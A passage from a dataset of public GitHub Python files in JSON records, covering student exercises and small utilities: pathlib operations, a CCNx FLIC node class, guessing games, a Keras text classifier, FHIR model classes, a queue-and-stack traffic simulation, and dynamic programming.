# directory A already existed here, so it can create C\n\nfor filename in ('ex1.txt', 'ex2.txt', 'ex3.txt'):\n    with open(path_b / filename, 'w', encoding='utf-8') as stream:\n        stream.write(f\"Jakaś treść w pliku {filename}\")\n        # ops_example/A/B/ex1.txt\n\n# moves the files to directory D; directory B was removed\nshutil.move(path_b, path_d)\nex1 = path_d / 'ex1.txt'\n# rename the file\nex1.rename(ex1.parent / 'ex1renamed.log')\n\nprint(base_path.absolute())\n# /Users/radoslawjaniak/PycharmProjects/bootcamp-python-18-11/ops_example\n\nprint(base_path.name) # ops_example\nprint(base_path.parent.absolute())\n# /Users/radoslawjaniak/PycharmProjects/bootcamp-python-18-11\n\nprint(base_path.suffix)\nprint(ex1.suffix) # .txt\nprint(base_path.parts) # ('ops_example',)\nprint(base_path2.parts) # ('ops_example', 'D')\n","repo_name":"rajkonkret/bootcamp-python-18-11","sub_path":"6.1 - katalogi.py","file_name":"6.1 - katalogi.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8180312005","text":"import ccnpy\nimport ccnpy.flic\n\n\nclass Node(ccnpy.TlvType):\n    __type = 0x0002\n\n    @classmethod\n    def class_type(cls):\n        return cls.__type\n\n    def __init__(self, node_data=None, hash_groups=None):\n        \"\"\"\n\n        :param node_data: (optional) ccnpy.flic.NodeData\n        :param hash_groups: a list of HashGroups\n        \"\"\"\n        ccnpy.TlvType.__init__(self)\n        if node_data is not None and not isinstance(node_data, ccnpy.flic.NodeData):\n            raise TypeError(\"node_data must be ccnpy.flic.NodeData\")\n\n        if hash_groups is None:\n            raise ValueError(\"hash_groups must not be None\")\n\n        if not isinstance(hash_groups, list) or len(hash_groups) == 0:\n            raise TypeError(\"hash_groups must be a list of one or more 
ccnpy.flic.HashGroup\")\n\n self._node_data = node_data\n self._hash_groups = hash_groups\n\n self._tlv = ccnpy.Tlv(self.class_type(), [self._node_data, *self._hash_groups])\n\n def __len__(self):\n return len(self._tlv)\n\n def __eq__(self, other):\n if self.__dict__ == other.__dict__:\n return True\n return False\n\n def __repr__(self):\n hash_values_len = len(self.hash_values())\n return \"Node: {%r, %r, %r}\" % (self._node_data, hash_values_len, self._hash_groups)\n\n def node_data(self):\n return self._node_data\n\n def hash_groups(self):\n return self._hash_groups\n\n def serialize(self):\n return self._tlv.serialize()\n\n def serialized_value(self):\n \"\"\"\n The value of the Node's TLV byte array, which is used encrypted in an EncryptedNode via\n some algorithm.\n\n :return: byte array\n \"\"\"\n return self._tlv.value()\n\n def node_locator(self):\n \"\"\"\n A short-cut to calling node_data().locators()[0]\n :return: (node_data().locators[0], node_data.locators.final()) or (None, None)\n \"\"\"\n locator = None\n final = None\n if self._node_data is not None:\n locators = self._node_data.locators()\n if locators is not None:\n final = locators.final()\n locator = locators[0]\n return locator, final\n\n def hash_values(self):\n \"\"\"\n Return an in-order list of all pointer hash values from all hash groups\n :return: A list\n \"\"\"\n hash_values = []\n for hg in self._hash_groups:\n for hv in hg.pointers():\n hash_values.append(hv)\n return hash_values\n\n @classmethod\n def parse(cls, tlv):\n if tlv.type() != cls.class_type():\n raise RuntimeError(\"Incorrect TLV type %r\" % tlv.type())\n\n node_data = None\n hash_groups = []\n\n offset = 0\n while offset < tlv.length():\n inner_tlv = ccnpy.Tlv.deserialize(tlv.value()[offset:])\n offset += len(inner_tlv)\n\n if inner_tlv.type() == ccnpy.flic.NodeData.class_type():\n assert node_data is None\n node_data = ccnpy.flic.NodeData.parse(inner_tlv)\n\n elif inner_tlv.type() == ccnpy.flic.HashGroup.class_type():\n hash_group = ccnpy.flic.HashGroup.parse(inner_tlv)\n hash_groups.append(hash_group)\n\n else:\n raise RuntimeError(\"Unsupported packet TLV type %r\" % inner_tlv)\n\n return cls(node_data=node_data, hash_groups=hash_groups)\n","repo_name":"mmosko/ccnpy","sub_path":"ccnpy/flic/Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9861591424","text":"from random import randint\nchislo = randint(0,7)\nnumber = int(input(\"Введите число от 0 до 10: \"))\nwhile number != chislo:\n if number > chislo:\n print(\"Загаданое число меньше! уменьшааай!\")\n if number < chislo:\n print(\"Загаданное число больше!!! Надо боольше ЗОЛОТА!\")\n if number == \"\":\n print(\"Вы не ввели ЧИСЛО!!! Число хочу, давай чило!А?\")\n number = int(input(\"Попробуй еще раз введи числдо 0 до 10: \"))\n if number == chislo:\n print(number, \"Правильное число! Вы победили!\")\n number = input(\"Хотите сыграть еще раз? 
да/нет?\")\n if number == \"да\":\n number = int(input(\"Попробуй еще раз введи числдо 0 до 10: \"))\nprint(\"досвидания\")\n","repo_name":"igorkrisin/python","sub_path":"Код из книги/GuessingGameNumber.py","file_name":"GuessingGameNumber.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14830785466","text":"import tensorflow as tf\nfrom tensorflow import keras\n\nimport random\nimport numpy as np\nimport csv\n\nprocessed_data = open('processed_data.csv','r')\n\ndata_X = []\ndata_labels = []\n\nfirstline = processed_data.readline()\n\nmyreader = csv.reader(processed_data,delimiter=',')\nTFMap = {'True':1,'False':0}\nsublist = {\"AskReddit\":0,\"politics\":1,'worldnews':2,\n 'nba':3,'funny':4,'movies':5}\n\nfor line in myreader:\n data_X.append(np.array([int(x) for x in line[:-1]]))\n data_labels.append(np.array(sublist[line[-1]]))\n\n#test_data = np.array(train_data[4000:])\n#test_labels = np.array(train_labels[4000:])\n#train_data = np.array(train_data[:4000])\n#train_labels = np.array(train_labels[:4000])\n\nNUM_WORDS = len(data_X[0])\n\ntest_size = len(data_X)//10\nprint(\"beginning cross validation:\")\nscores = [];\nloss = []\nfor i in range(10):\n\n test_data = np.array(data_X[i*test_size:((i+1)*test_size+1)])\n test_labels = np.array(data_labels[i*test_size:((i+1)*test_size+1)])\n train_data = np.array(data_X[:i*test_size] + data_X[(i+1)*test_size+1:])\n train_labels = np.array(data_labels[:i*test_size] +\n data_labels[(i+1)*test_size+1:])\n model = keras.Sequential([\n # `input_shape` is only required here so that `.summary` works. \n keras.layers.Dense(16, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dense(16, activation=tf.nn.relu),\n #keras.layers.Dropout(0.3),\n #keras.layers.Dense(16, activation=tf.nn.relu),\n #keras.layers.Dropout(0.3),\n keras.layers.Dense(6, activation=tf.nn.softmax)\n ])\n\n model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n model.summary()\n print(\"train size: \",len(train_data),\"test size: \", len(test_data))\n history = model.fit(train_data,\n train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=1)\n\n results = model.evaluate(test_data,test_labels)\n scores.append(results[1])\n loss.append(results[0])\n print(\"results\",results)\nprint(\"mean score\",np.mean(scores),\"stdev\",np.std(scores))\nprint(\"mean loss:\", np.mean(loss))\n\nimport matplotlib.pyplot as plt\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(1, len(acc) + 1)\n\nhistory_dict = history.history\nhistory_dict.keys()\n\n# \"bo\" is for \"blue dot\"\nplt.plot(epochs, loss, 'bo', label='Training loss')\n# b is for \"solid blue line\"\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\n\nplt.show()\n\nplt.clf() # clear figure\nacc_values = history_dict['acc']\nval_acc_values = history_dict['val_acc']\n\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation 
accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\n\nplt.show()\n\n","repo_name":"bhensey/349FinalProject","sub_path":"tensorflow_process.py","file_name":"tensorflow_process.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13739081240","text":"import json\nfrom pprint import pprint\n\n\"\"\" \nget_past_matches() returns a dictionary of a user's matches, which are\nindividual dictionaries.\nSample user data:\n    {\n        \"general\" : {\n            \"name\" : \"John Smith\",\n            \"zip code\" : 94555,\n            \"gender\" : \"male\",\n            \"year\" : 1\n        },\n        \"personality\" : {\n            \"extroversion\" : 0.91,\n            \"sensing\" : 0.32,\n            \"thinking\" : 0.75,\n            \"judging\" : 0.04\n        },\n        \"interests\" : [1, 5, 8]\n    }\n\"\"\"\n\ndef get_past_matches():\n    json_file = open('dataPast.json')\n    jdata = json.load(json_file)\n    past_matches = [user for user in jdata['users']]\n    json_file.close()\n    return past_matches\n    # return {\"A\",\"B\",\"C\"}\n\ndef get_current_match(username): #user is a string\n    json_matches = open('matches.json')\n    match_data = json.load(json_matches)\n    json_current = open('dataCurrent.json')\n    current_data = json.load(json_current)\n\n    usr = None\n    for dict in match_data['matches']:\n        if username == (dict[\"person1\"]):\n            usr = dict[\"person2\"]\n        elif username == (dict[\"person2\"]):\n            usr = dict[\"person1\"]\n    \n    for user in current_data['users']:\n        if user[\"general\"][\"name\"] == (usr):\n            json_matches.close()\n            json_current.close()\n            return user\n\n    json_matches.close()\n    json_current.close()\n    return None","repo_name":"mraheja/fifteen","sub_path":"match_utils.py","file_name":"match_utils.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37160677210","text":"# coding=utf-8\nimport click\n\nfrom ch.main import check_cli_version, add_commands, print_version\n\nfrom ch.log import configure_logger\n\nimport ch\n\n\n# is_eager=True means this command-line option takes priority over the other options;\n# expose_value=False means that if the option is not given, the normal command-line flow runs;\n# callback specifies the function to jump to when this command-line option is given;\n\n@click.group()\n@click.option('--version', is_flag=True, callback=print_version,\n              expose_value=False, is_eager=True, help=\"Show version info\")\n@click.option('-v', '--verbose', count=True, help='Turn on debug logging')\ndef cli(verbose):\n    \"\"\"\n    Russell CLI interacts with Russell server and executes your commands.\n    More help is available under each command listed below.\n    \"\"\"\n    ch.CODINGHUB_HOST = \"https://api.cannot.cc\"\n    ch.CODINGHUB_WEB_HOST = \"https://web.cannot.cc\"\n    ch.CODINGHUB_FS_HOST = \"fs.cannot.cc\"\n    ch.CODINGHUB_FS_PORT = 8081\n    configure_logger(verbose)\n\n\nadd_commands(cli)\n","repo_name":"zuiwan/CodingHub-CLI","sub_path":"ch/development/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41785596900","text":"import time\r\nimport random\r\n\r\n#Node class of a linked structure (used in the queue)\r\nclass Nodo:\r\n    def __init__(self, dado=0,proximo_nodo=None):\r\n        self.dado = dado\r\n        self.proximo = proximo_nodo\r\n\r\n    #Prints the node and its successor\r\n    def __repr__(self):\r\n        return '%s -> %s' %(self.dado,self.proximo)\r\n\r\n#Node class of a linked structure (used in the stack)\r\nclass Nodo2:\r\n    def __init__(self, dado=0, nodo_anterior=None):\r\n        self.dado = dado\r\n        
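# reference to the node below this one on the stack\r\n        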
self.anterior = nodo_anterior\r\n\r\n    def __repr__(self):\r\n        return '%s -> %s' % (self.dado, self.anterior)\r\n\r\n#Queue using a linked structure\r\nclass Fila:\r\n    def __init__(self):\r\n        self.primeiro = None\r\n        self.ultimo = None\r\n    \r\n    #Prints the queue; repr returns the representation as a string\r\n    def __repr__(self):\r\n        return \"[\" + str(self.primeiro) + \"]\"\r\n    \r\n    #Insert method; inserts at the end, since this is a queue\r\n    def insere(self, novo_dado):\r\n        \r\n        #Create a new node holding the value to be stored\r\n        novo_nodo = Nodo(novo_dado)\r\n        \r\n        #If the queue is empty, just insert\r\n        if self.primeiro == None:\r\n            self.primeiro = novo_nodo\r\n            self.ultimo = novo_nodo\r\n        else:\r\n            #Make the new node the last element of the queue\r\n            self.ultimo.proximo = novo_nodo\r\n            #Make the last element of the queue point to the new node\r\n            self.ultimo = novo_nodo\r\n    \r\n    #Remove method; removes at the front, since this is a queue\r\n    def remove(self):\r\n        assert self.primeiro != None, \"Rua já está vazia.\"\r\n        self.primeiro = self.primeiro.proximo\r\n        if self.primeiro == None:\r\n            self.ultimo = None\r\n\r\n#Stack using a linked structure\r\nclass Pilha:\r\n    def __init__(self):\r\n        self.topo = None\r\n    #Prints the stack as a string representation\r\n    def __repr__(self):\r\n        return \"[\" + str(self.topo) + \"]\"\r\n\r\n    def insere(self, novo_dado):\r\n        \r\n        # Create a new node holding the value to be stored.\r\n        novo_nodo = Nodo2(novo_dado)\r\n        \r\n        # Make the new node the top of the stack.\r\n        novo_nodo.anterior = self.topo\r\n        \r\n        # Make the head of the list reference the new node.\r\n        self.topo = novo_nodo\r\n    \r\n\r\n    def remove(self):\r\n\r\n        assert self.topo, \"Impossível remover valor de pilha vazia.\"\r\n\r\n        self.topo = self.topo.anterior\r\n\r\n#Create a queue for each lane\r\npista1 = Fila()\r\npista2 = Fila()\r\n\r\n#Randomly distribute 10 cars between lanes 1 and 2\r\nfor i in range(10):\r\n    x=random.randint(1,2)\r\n    \r\n    if x==1:\r\n        pista1.insere(f\"\\033[1;96mcarro {i+1}\\033[1;96m\")\r\n        print(f\"\\033[0;0mCarro {i+1} entrando na pista {x}:\t\\033[0;0m {pista1}\")\r\n        time.sleep(random.randint(1,5)) #Random delay of 1 to 5 seconds for the cars to enter the lanes\r\n    \r\n    else:\r\n        pista2.insere(f\"\\033[1;95mcarro {i+1}\\033[1;95m\")\r\n        print(f\"\\033[0;0mCarro {i+1} entrando na pista {x}:\t\\033[0;0m {pista2}\")\r\n        time.sleep(random.randint(1,5))\r\n    \r\nprint('\\n') \r\n\r\n#\"Master\" while loop: keeps traffic lights 1 and 2 running until both queues are empty\r\nwhile True: \r\n    sinal1=True\r\n    sinal2=True\r\n    \r\n    count = 0\r\n    while sinal1: #Traffic light, lane 1\r\n\r\n        if count < 5: #count < 5 covers the 10 seconds of green light, since each car takes 2 seconds to leave. 
\r\n #Sendo assim, é permitido apenas 5 carros saírem da fila a cada vez que o sinal abre já que 2*5=10.\r\n print(\"\\033[42;1m--green light on (Semáforo 1)--\\033[0m\")\r\n if pista1.primeiro != None: #condição que verifica se a pista1 está vazia, se não, o primeiro da fila é liberado.\r\n time.sleep(2)\r\n pista1.remove()\r\n print(f\"Carro saiu da pista 1: {pista1}\")\r\n \r\n elif count < 10: #condição que representa o sinal vermelho\r\n print(\"\\n\\033[41;1m--red light on (Semáforo 1)--\\033\\n[0m\")\r\n break #caso true, o brake indica que o sinal2 foi aberto e este foi fechado.\r\n \r\n time.sleep(1) #tempo para visualização no terminal.\r\n count += 1 #incrementa-se o contador.\r\n \r\n count = 0 \r\n while sinal2: #Semáforo pista 2\r\n \r\n if count < 5: #condição menor que 5 conta os 10 segundos com o sinal verde, pois para os carros saírem leva-se 2 segundos cada. \r\n #Sendo assim, é permitido apenas 5 carros saírem da fila a cada vez que o sinal abre já que 2*5=10.\r\n print(\"\\033[42;1m--green light on (Semáforo 2)--\\033[0m\")\r\n if pista2.primeiro != None: #condição que verifica se a pista2 está vazia, se não, o primeiro da fila é liberado.\r\n time.sleep(2)\r\n pista2.remove()\r\n print(f\"Carro saiu da pista 2: {pista2}\")\r\n \r\n elif count < 10: #condição que representa o sinal vermelho\r\n print(\"\\n\\033[41;1m--red light on (Semáforo 2)--\\033\\n[0m\")\r\n break #caso true, o brake indica que o sinal1 foi aberto e este foi fechado\r\n \r\n time.sleep(1) #tempo para visualização no terminal\r\n count += 1 #incremetando o contador\r\n \r\n if pista1.primeiro == None: #após o break do sinal2 o interpretador afere com o IF se ambas as pistas estão vazias\r\n if pista2.primeiro == None:\r\n print(\"\\033[1;33m--Todos os carros foram em direção ao estacionamento--\\n\\033[1;33m\")\r\n break #break que encerra o While \"master\", indicando que todos os carros saíram em direção ao estacionamento.\r\n\r\n#Cria Pilha\r\nestacionamento = Pilha()\r\n\r\n#Insere os carros no estacionamento,vale ressaltar que independente do nº do mesmo no estacionameto, aqui esse é estabelecido de acordo com a ordem de chegada.\r\nfor i in range(5):\r\n estacionamento.insere(f\"\\033[1;34mcarro {i+1}\\033[1;34m\")\r\n print(f\"\\033[0;0mCarro {i+1} entrando no estacionamento: \\033[0;0m{estacionamento}\")\r\n time.sleep(2)\r\n \r\nprint('\\n')\r\n\r\nprint(\"\\033[1;33m--O estacionamento está lotado.--\\n\\033[1;33m\")\r\nprint(estacionamento)\r\n\r\n#Diz qual dos carros sera removido aleatoriamente\r\ny=random.randint(1,5)\r\nprint(f\"\\033[0;0mO carro a ser removido é o carro\\033[0;0m {y}\\n\")\r\n\r\n#Remove o conjunto de carros e os devolve a pista 1 de acordo com o valor aleatorio gerado\r\nif(y == 1):\r\n print(\"Os carros a serem removidos antes do carro 1 são [carro2 -> carro3 -> carro4 -> carro5].\")\r\n for i in range(5):\r\n estacionamento.remove()\r\n time.sleep(2)\r\n pista1.insere(f\"\\033[1;96mcarro {i+1}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {i+1} voltou para a pista 1:\\033[0;0m {pista1}\")\r\n\r\nelif(y == 2):\r\n print(\"Os carros a serem removidos antes do carro 2 são [carro3 -> carro4 -> carro5].\")\r\n for i in range(4):\r\n estacionamento.remove()\r\n time.sleep(2)\r\n pista1.insere(f\"\\033[1;96mcarro {i+3}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {i+3} voltou para a pista 1:\\033[0;0m {pista1}\")\r\n\r\nelif(y == 3):\r\n print(\"Os carros a serem removidos antes do carro 3 são [carro4 -> carro5].\")\r\n for i in range(3):\r\n estacionamento.remove()\r\n 
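The 5-cars-per-green limit these comments justify is simple arithmetic; spelled out as a sketch:

GREEN_SECONDS = 10   # length of one green phase in the loops above
EXIT_SECONDS = 2     # time.sleep(2) per departing car
cars_per_green = GREEN_SECONDS // EXIT_SECONDS
assert cars_per_green == 5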
time.sleep(2)\r\n pista1.insere(f\"\\033[1;96mcarro {5-i}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {5-i} voltou para a pista 1:\\033[0;0m {pista1}\")\r\n\r\nelif(y == 4):\r\n print(\"O carro a ser removido antes do carro 4 é o [carro5].\")\r\n for i in range(2):\r\n estacionamento.remove()\r\n time.sleep(2)\r\n pista1.insere(f\"\\033[1;96mcarro {5-i}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {5-i} voltou para a pista 1:\\033[0;0m {pista1}\")\r\n\r\nelse:\r\n print(\"O carro 5 é o último então pode sair direto.\")\r\n estacionamento.remove()\r\n time.sleep(2)\r\n pista1.insere(f\"\\033[1;96mcarro {5}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {5} voltou para a pista 1:\\033[0;0m {pista1}\")\r\n\r\n","repo_name":"JPedroo/Estrutura-de-dados_FIFO-Fila-LIFO-Pilha-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8072,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"44087053308","text":"from .fhirbase import fhirbase\n\n\nclass ImagingManifest(fhirbase):\n \"\"\"\n A text description of the DICOM SOP instances selected in the\n ImagingManifest; or the reason for, or significance of, the selection.\n\n Args:\n resourceType: This is a ImagingManifest resource\n identifier: Unique identifier of the DICOM Key Object Selection (KOS)\n that this resource represents.\n patient: A patient resource reference which is the patient subject of\n all DICOM SOP Instances in this ImagingManifest.\n authoringTime: Date and time when the selection of the referenced\n instances were made. It is (typically) different from the creation\n date of the selection resource, and from dates associated with the\n referenced instances (e.g. capture time of the referenced image).\n author: Author of ImagingManifest. It can be a human author or a\n device which made the decision of the SOP instances selected. For\n example, a radiologist selected a set of imaging SOP instances to\n attach in a diagnostic report, and a CAD application may author a\n selection to describe SOP instances it used to generate a detection\n conclusion.\n description: Free text narrative description of the ImagingManifest.\n The value may be derived from the DICOM Standard Part 16, CID-7010\n descriptions (e.g. Best in Set, Complete Study Content). Note that\n those values cover the wide range of uses of the DICOM Key Object\n Selection object, several of which are not supported by\n ImagingManifest. 
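The branch-per-target removal above is the same LIFO pop loop in every case; a compact sketch using a plain list as the stack:

estacionamento = ["carro 1", "carro 2", "carro 3", "carro 4", "carro 5"]  # carro 5 on top
alvo = "carro 2"
removidos = []
while estacionamento and estacionamento[-1] != alvo:
    removidos.append(estacionamento.pop())
assert removidos == ["carro 5", "carro 4", "carro 3"]
assert estacionamento[-1] == alvo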
Specifically, there is no expected behavior\n associated with descriptions that suggest referenced images be removed\n or not used.\n study: Study identity and locating information of the DICOM SOP\n instances in the selection.\n \"\"\"\n\n __name__ = 'ImagingManifest'\n\n def __init__(self, dict_values=None):\n self.resourceType = 'ImagingManifest'\n # type: str\n # possible values: ImagingManifest\n\n self.patient = None\n # reference to Reference: identifier\n\n self.authoringTime = None\n # type: str\n\n self.author = None\n # reference to Reference: identifier\n\n self.description = None\n # type: str\n\n self.study = None\n # type: list\n # reference to ImagingManifest_Study\n\n self.identifier = None\n # reference to Identifier\n\n if dict_values:\n self.set_attributes(dict_values)\n self.assert_type()\n\n def get_relationships(self):\n\n return [\n {'parent_entity': 'Reference',\n 'parent_variable': 'identifier',\n 'child_entity': 'ImagingManifest',\n 'child_variable': 'author'},\n\n {'parent_entity': 'ImagingManifest_Study',\n 'parent_variable': 'object_id',\n 'child_entity': 'ImagingManifest',\n 'child_variable': 'study'},\n\n {'parent_entity': 'Reference',\n 'parent_variable': 'identifier',\n 'child_entity': 'ImagingManifest',\n 'child_variable': 'patient'},\n\n {'parent_entity': 'Identifier',\n 'parent_variable': 'object_id',\n 'child_entity': 'ImagingManifest',\n 'child_variable': 'identifier'},\n ]\n\n\nclass ImagingManifest_Study(fhirbase):\n \"\"\"\n A text description of the DICOM SOP instances selected in the\n ImagingManifest; or the reason for, or significance of, the selection.\n\n Args:\n uid: Study instance UID of the SOP instances in the selection.\n imagingStudy: Reference to the Imaging Study in FHIR form.\n endpoint: The network service providing access (e.g., query, view, or\n retrieval) for the study. See implementation notes for information\n about using DICOM endpoints. A study-level endpoint applies to each\n series in the study, unless overridden by a series-level endpoint with\n the same Endpoint.type.\n series: Series identity and locating information of the DICOM SOP\n instances in the selection.\n \"\"\"\n\n __name__ = 'ImagingManifest_Study'\n\n def __init__(self, dict_values=None):\n self.uid = None\n # type: str\n\n self.imagingStudy = None\n # reference to Reference: identifier\n\n self.endpoint = None\n # type: list\n # reference to Reference: identifier\n\n self.series = None\n # type: list\n # reference to ImagingManifest_Series\n\n self.object_id = None\n # unique identifier for object class\n\n if dict_values:\n self.set_attributes(dict_values)\n\n def get_relationships(self):\n\n return [\n {'parent_entity': 'Reference',\n 'parent_variable': 'identifier',\n 'child_entity': 'ImagingManifest_Study',\n 'child_variable': 'endpoint'},\n\n {'parent_entity': 'Reference',\n 'parent_variable': 'identifier',\n 'child_entity': 'ImagingManifest_Study',\n 'child_variable': 'imagingStudy'},\n\n {'parent_entity': 'ImagingManifest_Series',\n 'parent_variable': 'object_id',\n 'child_entity': 'ImagingManifest_Study',\n 'child_variable': 'series'},\n ]\n\n\nclass ImagingManifest_Series(fhirbase):\n \"\"\"\n A text description of the DICOM SOP instances selected in the\n ImagingManifest; or the reason for, or significance of, the selection.\n\n Args:\n uid: Series instance UID of the SOP instances in the selection.\n endpoint: The network service providing access (e.g., query, view, or\n retrieval) for this series. 
See implementation notes for information\n about using DICOM endpoints. A series-level endpoint, if present, has\n precedence over a study-level endpoint with the same Endpoint.type.\n instance: Identity and locating information of the selected DICOM SOP\n instances.\n \"\"\"\n\n __name__ = 'ImagingManifest_Series'\n\n def __init__(self, dict_values=None):\n self.uid = None\n # type: str\n\n self.endpoint = None\n # type: list\n # reference to Reference: identifier\n\n self.instance = None\n # type: list\n # reference to ImagingManifest_Instance\n\n self.object_id = None\n # unique identifier for object class\n\n if dict_values:\n self.set_attributes(dict_values)\n\n def get_relationships(self):\n\n return [\n {'parent_entity': 'ImagingManifest_Instance',\n 'parent_variable': 'object_id',\n 'child_entity': 'ImagingManifest_Series',\n 'child_variable': 'instance'},\n\n {'parent_entity': 'Reference',\n 'parent_variable': 'identifier',\n 'child_entity': 'ImagingManifest_Series',\n 'child_variable': 'endpoint'},\n ]\n\n\nclass ImagingManifest_Instance(fhirbase):\n \"\"\"\n A text description of the DICOM SOP instances selected in the\n ImagingManifest; or the reason for, or significance of, the selection.\n\n Args:\n sopClass: SOP class UID of the selected instance.\n uid: SOP Instance UID of the selected instance.\n \"\"\"\n\n __name__ = 'ImagingManifest_Instance'\n\n def __init__(self, dict_values=None):\n self.sopClass = None\n # type: str\n\n self.uid = None\n # type: str\n\n self.object_id = None\n # unique identifier for object class\n\n if dict_values:\n self.set_attributes(dict_values)\n","repo_name":"thakur-amrita/Cardea","sub_path":"cardea/fhir/ImagingManifest.py","file_name":"ImagingManifest.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"3508696515","text":"class Context(object):\n \"\"\"Class to hold context about a the current code review and checkout.\"\"\"\n def __init__(self, rietveld, checkout, status, server_hooks_missing=False):\n \"\"\"\n Args:\n rietveld: Instance of rietveld.Rietveld.\n checkout: Instance of checkout.SvnCheckout\n status: Instance of async_push.AsyncPush.\n server_hooks_missing: True if the project's SVN repository does not have\n server-side hooks configured.\n \"\"\"\n self.rietveld = rietveld\n self.checkout = checkout\n self.status = status\n self.server_hooks_missing = server_hooks_missing\n","repo_name":"sunny-bay/chromium30","sub_path":"commit-queue/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40251341867","text":"n = int(input())\nnums = list(map(int, input().split()))\n\n# Top Down, TC: O(N) SC: O(N) + O(N) (Recursion stack with dp array)\ndp1 = [-1] * n\ndef topDown(idx):\n if idx == n-1: return nums[idx]\n if idx >= n: return 0\n if dp1[idx] != -1: return dp1[idx]\n\n pick = nums[idx] + topDown(idx+2)\n not_pick = topDown(idx+1)\n return max(pick, not_pick)\n\n# print(topDown(0))\n\n# Top Down, TC: O(N) SC: O(N)\ndef bottomUp():\n dp2 = [-1] * n\n dp2[-1] = nums[-1]\n for i in range(n-2, -1, -1):\n pick = nums[i]\n if i+2 < n:\n pick += dp2[i+2]\n not_pick = dp2[i+1]\n dp2[i] = max(pick, not_pick) \n return dp2[0]\n\n# print(bottomUp())\n\n# Top Down, TC: O(N) SC: O(1)\ndef bottomUpWithTabulation():\n prev = nums[-1]\n prev2 = 0\n\n for i in range(n-2, -1, -1):\n pick = nums[i]\n if i+2 < n:\n pick += 
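A hypothetical usage sketch for the classes in this record, assuming fhirbase.set_attributes (not shown here) simply copies matching keys from dict_values onto the instance:

instance = ImagingManifest_Instance(dict_values={
    "sopClass": "1.2.840.10008.5.1.4.1.1.2",   # CT Image Storage SOP class UID, as an example
    "uid": "1.2.3.4.5",                        # placeholder instance UID
})
assert instance.uid == "1.2.3.4.5"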
prev2\n not_pick = prev\n curr = max(pick, not_pick)\n prev, prev2 = curr, prev\n return prev\n\nprint(bottomUpWithTabulation())","repo_name":"Naboni/Competitive-Programming","sub_path":"houseRobber.py","file_name":"houseRobber.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21154332556","text":"import time\nimport random\n\nprint(\"Try to influence the direction of the X on this line\")\nprint(\"----------X----------\")\ntime.sleep(0.4)\ndirection = input(\"Type 'positive' for right or 'negative' for left\\n\")\ndirection.lower()\nwhile direction !='positive' or direction !='negative': \n if direction == 'positive':\n print()\n break\n elif direction == 'negative':\n print()\n break\n else:\n print(\"Try to influence the outcome of random numbers.\")\n time.sleep(0.4)\n direction = input(\"Type 'positive' or 'negative'\\n\")\n\ntime.sleep(0.2)\nprint (\"You chose\", direction)\ntime.sleep(1)\nprint (\"Visualize your\", direction, \"energy.\")\ntime.sleep(1)\nprint (\"Get Ready!\")\ntime.sleep(0.5)\nprint(\"3\") \ntime.sleep(1)\nprint(\"2\") \ntime.sleep(1)\nprint(\"1\")\ntime.sleep(1)\nprint(\"Go\")\n\nposition = 10\nline = '-'*21\n\ndef adjustLine(roll):\n time.sleep(0.3)\n global position\n global line \n line = '-'*21\n line_list = list(line)\n position += roll\n line_list[ position] = 'X'\n line = \"\".join(line_list)\n return line\n\nfor x in range(10):\n print(adjustLine(1 if random.random() < 0.5 else -1))\n\ntime.sleep(0.4)\nprint(\"Calculating...\")\ntime.sleep(1)\nprint(\"..\")\ntime.sleep(1)\nif direction == 'positive' and position > 10 or direction == 'negative' and position < 10:\n print(\"You did it!\", \"\\nYour conscious efforts made the X move.\")\nelse:\n print(\"Your psychic powers need improvement!\")\n \n","repo_name":"johnschwarz/PsychicTest","sub_path":"PsyTest.py","file_name":"PsyTest.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74930025013","text":"import Pyro4\nimport os\nimport json\nimport base64\nimport client.model as modelMod\nimport typing as typ\n\nclass Client:\n def __init__(self, host, port, identifier = \"main-\"):\n self.host = host\n self.port = port\n self.identifier = identifier\n self.objects = dict()\n\n def Start(self, remoteObjects):\n for obj in remoteObjects:\n url = \"PYRONAME:%s%s@%s:%d\" 